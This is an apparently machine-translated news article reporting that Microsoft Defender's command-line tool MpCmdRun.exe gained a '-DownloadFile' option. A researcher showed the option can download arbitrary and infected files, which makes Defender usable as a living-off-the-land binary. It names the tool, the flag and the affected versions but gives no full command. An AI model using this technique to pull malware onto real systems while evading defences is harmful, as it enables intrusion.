Windows 10, the antivirus that makes viruses download by mistake

Who I am
Miguel Moro Vallina
@miguelmorovallina
Author and references

A recent change in Microsoft Defender, thefree antivirus distributed by Microsoft together with the Windows 10 operating system, it has something paradoxical: it allows you to download viruses. Cybersecurity researcher Mohammad Askar discovered it: with antivirus, in fact, it is possible to download all types of files from the Internet, including those infected.

Askar found this new feature in Microsoft Defender versions 4.18.2007.9 and 4.18.2009.9 and tried to use it to download a virus to his computer. Perfectly successful experiment: Defender downloaded the infected file asked by Askar. The only reassuring thing, in all of this, is that the same Microsoft Defender finds the virus and blocks it on the first scan. But it is decidedly curious that Microsoft has included the possibility of downloading files inside the antivirus. Even more curious is that these files can even be infected. In previous versions of Defender, in fact, there was no such command and it was not possible to download files.



How to download viruses with Microsoft Defender

Microsoft Defender contains the MpCmdRun.exe tool, which is used to run the antivirus from command line. The novelty introduced in the latest versions is the "-DownloadFile" command, which was not there before, and which can be used to download a specific file from a specific Web address to a specific folder on your computer.

A boon for anyone who wants to download a virus on a Windows PC, because Defender is pre-installed with the operating system and cannot be removed, so it is found on all PCs. Technically, therefore, the same Microsoft antivirus can be used by a hacker as "LOLBIN", that is "living-off-the-land binaries". This term refers to those system files which are absolutely legitimate and official, but which can be exploited by hackers for dangerous purposes.



Is Microsoft Defender dangerous?

At this point we have to ask ourselves if and how much Microsoft Defender can be dangerous. It must be said that the infected files downloaded for testing by Askar and other researchers, when run on the same computer, were discovered by Defender on the next scan.


The question, however, is whether the other antiviruses would recognize them as well, since it is often necessary to disable Defender to make another antivirus work without problems. But in theory it is also possible that files downloaded with Microsoft's antivirus contain them new viruses, not yet known by either Defender or other antiviruses.


Windows 10, the antivirus that makes viruses download by mistake


Audio Video Windows 10, the antivirus that makes viruses download by mistake
add a comment of Windows 10, the antivirus that makes viruses download by mistake
Comment sent successfully! We will review it in the next few hours.